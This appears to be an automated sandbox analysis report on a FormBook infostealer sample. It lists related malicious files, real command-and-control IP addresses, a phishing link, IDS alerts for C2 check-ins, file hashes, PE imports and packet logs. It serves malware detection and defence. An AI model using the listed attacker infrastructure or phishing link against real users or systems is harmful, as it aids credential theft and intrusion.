                        fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                        • 43.242.202.169
                        Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • 23.224.37.76
                        5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                        • 43.242.202.169
                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                        • 43.242.202.169
                        na.elfGet hashmaliciousUnknownBrowse
                        • 154.90.62.142
                        na.elfGet hashmaliciousUnknownBrowse
                        • 154.90.62.142
                        na.elfGet hashmaliciousUnknownBrowse
                        • 154.90.62.142
                        na.elfGet hashmaliciousUnknownBrowse
                        • 154.90.62.142
                        INTERNET-CZKtis238403KtisCZZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        POPO00003964.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        PO2024033194.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                        • 81.2.196.19
                        ExeFile (156).exeGet hashmaliciousEmotetBrowse
                        • 81.2.235.111
                        NAMECHEAP-NETUSLegionLoader (13).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader (14).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader (15).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader (10).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader (11).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader (12).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader (9).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader (2).msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        LegionLoader.msiGet hashmaliciousUnknownBrowse
                        • 162.255.119.168
                        https://shoutout.wix.com/so/68P9j4pbc/c?w=YIpy_LmKpeOuRTcqEasLgbctjTenhex96yD397bZU04.eyJ1IjoiaHR0cHM6Ly9maWxlc3NoYXJlcy5naXRodWIuaW8vYXJ1dHkvIiwiciI6IjU3ZWU5MDNjLTU1YjktNDMxYS0zNDRiLWUzZjYxNjRhN2I0MiIsIm0iOiJtYWlsIiwiYyI6IjAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMCJ9Get hashmaliciousHTMLPhisherBrowse
                        • 68.65.122.113
                        No context
                        No context
                        Process:C:\Windows\SysWOW64\write.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                        Category:dropped
                        Size (bytes):196608
                        Entropy (8bit):1.1239949490932863
                        Encrypted:false
                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                        MD5:271D5F995996735B01672CF227C81C17
                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\lPX6PixV4t.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):287744
                        Entropy (8bit):7.99438659845758
                        Encrypted:true
                        SSDEEP:6144:3R6G++/WM55+dz4IXPBRtrJNAV4EWTq4NwNeZ5K4fFb+7OXZoP:k1ZQYzXpR1JNAsYwXK4dNJoP
                        MD5:BF911A025C61E37D42CE7320D9D6F58B
                        SHA1:7F1036669156AA36826ED1F5A58AF177954A3E05
                        SHA-256:62428200CB74E762121C4B86B8DEDE7F19FB24B5A517D2D8B43446C9AB4B7ABB
                        SHA-512:53525DB0142B85F8A054C9E2BADBE52B65504A12151A71A9D55AADC46EDD9A8FE026030E03A34E0A2F352F241F86F9CD9B6B4C31ED54D6059C5D568A1273C495
                        Malicious:false
                        Reputation:low
                        Preview:.....S1FUo..H..d.FD...P9...5GA782QXXFGBMA8S1FU75GA782QXXF.BMA6L.HU.<.`.9~.y...1m1J<V44Z.$ YV]%x:#g08/.:_f.xfg,X\W.UULcBMA8S1F,6<.|W_.l8?.z"*."...oWR.[...m8?.]...3V..^V/|W_.QXXFGBMAh.1F.64G...RQXXFGBMA.S3G^6>GAe<2QXXFGBMAHG1FU'5GAG<2QX.FGRMA8Q1FS75GA782WXXFGBMA8#5FU55GA782SX..GB]A8C1FU7%GA'82QXXFWBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GoC]J%XXFC.IA8C1FUe1GA'82QXXFGBMA8S1Fu75'A782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXFGBMA8S1FU75GA782QXXF
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.528624799402299
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:lPX6PixV4t.exe
                        File size:1'338'977 bytes
                        MD5:1f52b1deb6cbe7bfd6a5cf023069d858
                        SHA1:115636cc2304d78c8978d4295c288d06e28d489c
                        SHA256:20c72b8fedc9a01361a10d32b510de20deaba414716db9fd6134f9eb8fe8747b
                        SHA512:776019f2d5d7d2a64aa3bb5c9b2619be340729deffdf4d983a2bd066ed2e18c05a8d726a56883fc480d608bcd17bb1f2c581d8eea265bb7da1b94ba62b5c09ba
                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCxrodtfZ9okA85L1HliFYSGnLc/:7JZoQrbTFZY1iaCKjhSkA8J1R5nLc/
                        TLSH:D055E121F5D68036C2B327B19E7EF7AA9A3969360337D2D723C82D350E905416B29773
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                        Icon Hash:1733312925935517
                        Entrypoint:0x4165c1
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:0
                        File Version Major:5
                        File Version Minor:0
                        Subsystem Version Major:5
                        Subsystem Version Minor:0
                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                        Instruction
                        call 00007FD33CB903EBh
                        jmp 00007FD33CB8725Eh
                        int3
                        int3
                        int3
                        int3
                        int3
                        push ebp
                        mov ebp, esp
                        push edi
                        push esi
                        mov esi, dword ptr [ebp+0Ch]
                        mov ecx, dword ptr [ebp+10h]
                        mov edi, dword ptr [ebp+08h]
                        mov eax, ecx
                        mov edx, ecx
                        add eax, esi
                        cmp edi, esi
                        jbe 00007FD33CB873DAh
                        cmp edi, eax
                        jc 00007FD33CB87576h
                        cmp ecx, 00000080h
                        jc 00007FD33CB873EEh
                        cmp dword ptr [004A9724h], 00000000h
                        je 00007FD33CB873E5h
                        push edi
                        push esi
                        and edi, 0Fh
                        and esi, 0Fh
                        cmp edi, esi
                        pop esi
                        pop edi
                        jne 00007FD33CB873D7h
                        jmp 00007FD33CB877B2h
                        test edi, 00000003h
                        jne 00007FD33CB873E6h
                        shr ecx, 02h
                        and edx, 03h
                        cmp ecx, 08h
                        jc 00007FD33CB873FBh
                        rep movsd
                        jmp dword ptr [00416740h+edx*4]
                        mov eax, edi
                        mov edx, 00000003h
                        sub ecx, 04h
                        jc 00007FD33CB873DEh
                        and eax, 03h
                        add ecx, eax
                        jmp dword ptr [00416654h+eax*4]
                        jmp dword ptr [00416750h+ecx*4]
                        nop
                        jmp dword ptr [004166D4h+ecx*4]
                        nop
                        inc cx
                        add byte ptr [eax-4BFFBE9Ah], dl
                        inc cx
                        add byte ptr [ebx], ah
                        ror dword ptr [edx-75F877FAh], 1
                        inc esi
                        add dword ptr [eax+468A0147h], ecx
                        add al, cl
                        jmp 00007FD33EFFFBD7h
                        add esi, 03h
                        add edi, 03h
                        cmp ecx, 08h
                        jc 00007FD33CB8739Eh
                        rep movsd
                        jmp dword ptr [00000000h+edx*4]
                        Programming Language:
                        • [ C ] VS2010 SP1 build 40219
                        • [C++] VS2010 SP1 build 40219
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2010 SP1 build 40219
                        • [RES] VS2010 SP1 build 40219
                        • [LNK] VS2010 SP1 build 40219
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                        RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                        RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                        RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                        RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                        RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                        RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                        RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                        RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                        RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                        RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                        RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                        DLLImport
                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                        USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                        GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                        OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain
                        EnglishUnited States
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-09T12:42:55.053219+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499823.33.130.19080TCP
                        2024-10-09T12:43:11.318350+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998623.224.37.7880TCP
                        2024-10-09T12:43:13.862896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998723.224.37.7880TCP
                        2024-10-09T12:43:16.407225+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998923.224.37.7880TCP
                        2024-10-09T12:43:18.973790+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999123.224.37.7880TCP
                        2024-10-09T12:43:25.184455+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999252.187.43.4080TCP
                        2024-10-09T12:43:27.668580+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999352.187.43.4080TCP
                        2024-10-09T12:43:30.238313+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999452.187.43.4080TCP
                        2024-10-09T12:43:32.782721+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999552.187.43.4080TCP
                        2024-10-09T12:43:38.961475+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649996199.192.21.16980TCP
                        2024-10-09T12:43:41.497091+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997199.192.21.16980TCP
                        2024-10-09T12:43:44.040118+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999199.192.21.16980TCP
                        2024-10-09T12:43:46.570817+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650000199.192.21.16980TCP
                        2024-10-09T12:43:52.321727+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000181.2.196.1980TCP
                        2024-10-09T12:43:54.851004+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000281.2.196.1980TCP
                        2024-10-09T12:43:57.482058+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000381.2.196.1980TCP
                        2024-10-09T12:44:00.019227+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000481.2.196.1980TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Oct 9, 2024 12:42:54.579304934 CEST4998280192.168.2.63.33.130.190
                        Oct 9, 2024 12:42:54.584243059 CEST80499823.33.130.190192.168.2.6
                        Oct 9, 2024 12:42:54.584328890 CEST4998280192.168.2.63.33.130.190
                        Oct 9, 2024 12:42:54.592124939 CEST4998280192.168.2.63.33.130.190
                        Oct 9, 2024 12:42:54.597090006 CEST80499823.33.130.190192.168.2.6
                        Oct 9, 2024 12:42:55.051175117 CEST80499823.33.130.190192.168.2.6
                        Oct 9, 2024 12:42:55.051542044 CEST80499823.33.130.190192.168.2.6
                        Oct 9, 2024 12:42:55.053219080 CEST4998280192.168.2.63.33.130.190
                        Oct 9, 2024 12:42:55.054425955 CEST4998280192.168.2.63.33.130.190
                        Oct 9, 2024 12:42:55.059221983 CEST80499823.33.130.190192.168.2.6
                        Oct 9, 2024 12:43:10.690440893 CEST4998680192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:10.695765018 CEST804998623.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:10.695904016 CEST4998680192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:10.710119009 CEST4998680192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:10.715743065 CEST804998623.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:11.318106890 CEST804998623.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:11.318350077 CEST4998680192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:12.225327015 CEST4998680192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:12.455105066 CEST804998623.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:13.247195959 CEST4998780192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:13.252161026 CEST804998723.224.37.78192.168.2.6
                        Oct 9, 2024 12:43:13.252247095 CEST4998780192.168.2.623.224.37.78
                        Oct 9, 2024 12:43:13.269772053 CEST4998780192.168.2.623.224.37.78
